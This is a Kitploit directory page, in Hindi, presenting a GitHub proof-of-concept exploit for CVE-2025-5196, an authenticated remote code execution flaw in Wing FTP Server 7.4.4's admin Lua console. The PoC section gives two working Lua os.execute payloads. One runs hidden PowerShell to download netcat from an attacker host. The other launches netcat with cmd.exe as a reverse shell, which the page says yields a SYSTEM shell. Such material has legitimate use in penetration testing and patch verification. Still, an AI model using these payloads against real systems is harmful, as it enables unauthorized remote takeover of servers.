Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Wing-FTP-Server-7.4.4-RCE-Authenticated — Wing FTP Server अपने वेब इंटरफ़ेस के माध्यम से सुलभ एक प्रशासनिक Lua स्क्रिप्टिंग कंसोल प्रदान करता है। प्रमाणित प्रशासक अपर्याप्त सैंडबॉक्सिंग के साथ मनमाना Lua कोड निष्पादित करने में सक्षम हैं। CVE-2025-5196 | Kitploit
उपकरण/GitHubGitHub/nouvexr/wing-ftp-server-7.4.4-rce-authenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubnouvexr/wing-ftp-server-7.4.4-rce-authenticated

Wing-FTP-Server-7.4.4-RCE-Authenticated

Wing FTP Server अपने वेब इंटरफ़ेस के माध्यम से सुलभ एक प्रशासनिक Lua स्क्रिप्टिंग कंसोल प्रदान करता है। प्रमाणित प्रशासक अपर्याप्त सैंडबॉक्सिंग के साथ मनमाना Lua कोड निष्पादित करने में सक्षम हैं। CVE-2025-5196

रिपॉजिटरी देखें
2121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Wing FTP Server 7.4.4 - रिमोट कोड निष्पादन (प्रमाणित) (CVE-2025-5196)

Wing FTP Server अपने वेब इंटरफ़ेस के माध्यम से सुलभ एक प्रशासनिक Lua स्क्रिप्टिंग कंसोल प्रदान करता है। प्रमाणित प्रशासक अपर्याप्त सैंडबॉक्सिंग के साथ मनमाना Lua कोड निष्पादित करने में सक्षम हैं।

प्रभावित संस्करण: Wing FTP Server 7.4.4 (Windows) | प्रमाणीकरण आवश्यक: हाँ


डाउनलोड और रिलीज़ नोट्स

24 मई, 2025 तक, विक्रेता द्वारा प्रदत्त एप्लिकेशन का नवीनतम संस्करण निम्नलिखित लिंक पर पाया जा सकता है: https://www.wftpserver.com/download.htm

इसके अतिरिक्त, यह ध्यान देने योग्य है कि उसी तिथि तक, एक रिलीज़ नोट प्रकाशित किया गया है जिसमें बताया गया है कि RCE भेद्यता संस्करण 7.4.4 में ठीक कर दी गई है। रिलीज़ नोट्स का लिंक यहाँ पाया जा सकता है: https://www.wftpserver.com/serverhistory.htm

image


PoC

CVE-2025-5196 से संबंधित PoC VulDB

image

Wing FTP Server वेब इंटरफ़ेस

image

image

कमांड का पहला भाग nc.exe (Windows x86 के लिए netcat) को पथ "C:\Users\usuario\Desktop\Drops" पर डाउनलोड करेगा। दूसरा भाग nc.exe 192.168.234.131 4443 -e cme.exe निष्पादित करेगा।

root@kitploit:~
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
root@kitploit:~
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

image

NT/SYSTEM शेल

image

टूल डाउनलोड करें